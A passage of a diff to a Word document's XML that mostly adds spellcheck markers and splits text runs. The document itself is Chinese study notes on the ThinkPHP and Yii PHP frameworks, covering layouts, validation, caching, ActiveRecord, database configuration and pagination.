                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:t>php</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="0070C0"/>
@@ -8547,9 +9360,11 @@
               </w:rPr>
               <w:t>，</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>config.php</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -8586,7 +9401,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">        'layout_on'=&gt;true,</w:t>
+              <w:t xml:space="preserve">        '</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>layout_on</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'=&gt;true,</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -8621,7 +9450,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">        'layout_name'=&gt;'layout',</w:t>
+              <w:t xml:space="preserve">        '</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>layout_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'=&gt;'layout',</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -8790,9 +9633,11 @@
             <w:r>
               <w:t>不配置</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>config.php</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -8870,7 +9715,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>$view-&gt;engine-&gt;layout('Layout/newlayout');</w:t>
+              <w:t>$view-&gt;engine-&gt;layout('Layout/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>newlayout</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>');</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -8970,24 +9829,28 @@
               </w:rPr>
               <w:t>中的标签库前缀，</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>ThinkPHP</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>内置的标签库是</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>Cx</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -9399,7 +10262,23 @@
                 <w:b/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>'name'  =&gt; ['require','max'=&gt;25],</w:t>
+              <w:t>'name'  =&gt; ['</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>require','max</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'=&gt;25],</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9476,7 +10355,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">        'name'=&gt;'thinkphp',</w:t>
+              <w:t xml:space="preserve">        'name'=&gt;'</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>thinkphp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>',</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9517,7 +10410,14 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>if(!$validate-&gt;check($data</w:t>
+              <w:t>if(!$validate-&gt;check($</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>data</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -9525,6 +10425,7 @@
               </w:rPr>
               <w:t>,$rule</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="0070C0"/>
@@ -9542,7 +10443,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">       dump($validate-&gt;getError());</w:t>
+              <w:t xml:space="preserve">       dump($validate-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>getError</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>());</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9804,7 +10719,25 @@
                 <w:color w:val="0070C0"/>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">    ['email','email','</w:t>
+              <w:t xml:space="preserve">    ['</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>email','email</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>','</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10023,7 +10956,23 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">    'path'  =&gt;  APP_PATH.'Runtime/cache/', // </w:t>
+              <w:t xml:space="preserve">    'path'  =&gt;  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>APP_PATH.'Runtime</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">/cache/', // </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10094,12 +11043,21 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">var_dump(S('name')); // </w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>var_dump</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">(S('name')); // </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10115,7 +11073,23 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">S('name',NULL); // </w:t>
+              <w:t>S('</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>name',NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">); // </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10192,11 +11166,19 @@
             <w:tcW w:w="6439" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Yii </w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Yii</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10256,7 +11238,21 @@
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
-              <w:t xml:space="preserve"> RESTful Web </w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>RESTful</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Web </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10266,12 +11262,14 @@
             </w:r>
           </w:p>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>Yii</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>主要目录结构：</w:t>
             </w:r>
@@ -10350,14 +11348,26 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:t>https://www.barretren.com/ /YII/web/index.php?</w:t>
+              <w:t>https://www.barretren.com/ /YII/web/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>index.php?</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:b/>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>r=</w:t>
+              <w:t>r</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>=</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10548,6 +11558,7 @@
               </w:rPr>
               <w:t xml:space="preserve">class </w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="0070C0"/>
@@ -10555,6 +11566,7 @@
               </w:rPr>
               <w:t>HelloController</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="0070C0"/>
@@ -10605,6 +11617,7 @@
               <w:tab/>
               <w:t xml:space="preserve">public function </w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -10613,12 +11626,29 @@
               </w:rPr>
               <w:t>actionHello</w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">($msg="hello world"){//action </w:t>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>($</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>msg</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">="hello world"){//action </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10705,6 +11735,7 @@
               </w:rPr>
               <w:t>下的</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -10712,6 +11743,7 @@
               </w:rPr>
               <w:t>mian</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -10737,7 +11769,21 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>return $this-&gt;render("hello",['message'=&gt;$msg]);</w:t>
+              <w:t>return $this-&gt;render("hello",['message'=&gt;$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>msg</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>]);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -10795,9 +11841,11 @@
             <w:r>
               <w:t>为</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>php</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>文件，名称要与</w:t>
             </w:r>
@@ -10842,8 +11890,18 @@
                 <w:b/>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>.php</w:t>
-            </w:r>
+              <w:t>.</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>php</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -10882,6 +11940,7 @@
             <w:r>
               <w:t>普通模型）或</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -10891,6 +11950,7 @@
             <w:r>
               <w:t>Record</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>（数据包关联）</w:t>
             </w:r>
@@ -10952,7 +12012,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>class EntryForm extends Model{</w:t>
+              <w:t xml:space="preserve">class </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>EntryForm</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> extends Model{</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11125,7 +12199,21 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>[['name','email'],'required'],</w:t>
+              <w:t>[['</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>name','email</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'],'required'],</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11151,7 +12239,21 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>['email','email']</w:t>
+              <w:t>['</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>email','email</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>']</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11207,7 +12309,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>public function actionEntry(){</w:t>
+              <w:t xml:space="preserve">public function </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>actionEntry</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>(){</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11227,7 +12343,21 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>$model=new EntryForm();</w:t>
+              <w:t xml:space="preserve">$model=new </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>EntryForm</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11247,7 +12377,21 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t xml:space="preserve">if ($model-&gt;load(\Yii::$app-&gt;request-&gt;post()) </w:t>
+              <w:t>if ($model-&gt;load(\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Yii</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">::$app-&gt;request-&gt;post()) </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11401,6 +12545,7 @@
             <w:tcW w:w="6439" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -11408,6 +12553,7 @@
               </w:rPr>
               <w:t>ActiveRecord</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -11445,6 +12591,7 @@
             <w:r>
               <w:t>）</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>C</w:t>
             </w:r>
@@ -11452,11 +12599,20 @@
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
-              <w:t>onfig/</w:t>
-            </w:r>
+              <w:t>onfig</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>db.php</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -11492,7 +12648,35 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">    'class' =&gt; 'yii\db\Connection',</w:t>
+              <w:t xml:space="preserve">    'class' =&gt; '</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>yii</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>db</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>\Connection',</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11506,7 +12690,49 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">    'dsn' =&gt; 'mysql:host=localhost;dbname=test',</w:t>
+              <w:t xml:space="preserve">    '</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>dsn</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>' =&gt; '</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>mysql:host</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>localhost;dbname</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>=test',</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11520,7 +12746,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">    'username' =&gt; 'barret',</w:t>
+              <w:t xml:space="preserve">    'username' =&gt; '</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>barret</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>',</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11584,9 +12824,11 @@
               </w:rPr>
               <w:t>模型继承</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>ActiveRecord</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -11635,7 +12877,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>class Country extends ActiveRecord{</w:t>
+              <w:t xml:space="preserve">class Country extends </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>ActiveRecord</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>{</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11740,7 +12996,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>$countries = Country::find()-&gt;orderBy('name')-&gt;all();</w:t>
+              <w:t>$countries = Country::find()-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>orderBy</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>('name')-&gt;all();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11818,7 +13088,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>$country = Country::findOne('US');</w:t>
+              <w:t>$country = Country::</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>findOne</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>('US');</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11999,6 +13283,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -12006,17 +13291,26 @@
               </w:rPr>
               <w:t>Yii</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>自带分页插件：</w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>yii\data\</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>yii</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>\data\</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12076,7 +13370,21 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>'defaultPageSize' =&gt; 5,  //</w:t>
+              <w:t>'</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>defaultPageSize</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>' =&gt; 5,  //</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12102,7 +13410,21 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>'totalCount' =&gt; $query-&gt;count(), //</w:t>
+              <w:t>'</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>totalCount</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>' =&gt; $query-&gt;count(), //</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12179,7 +13501,21 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>$countries Country::find()-&gt;orderBy('name')</w:t>
+              <w:t>$countries Country::find()-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>orderBy</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>('name')</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12458,7 +13794,35 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>use yii\widgets\LinkPager;</w:t>
+              <w:t xml:space="preserve">use </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>yii</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>\widgets\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>LinkPager</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
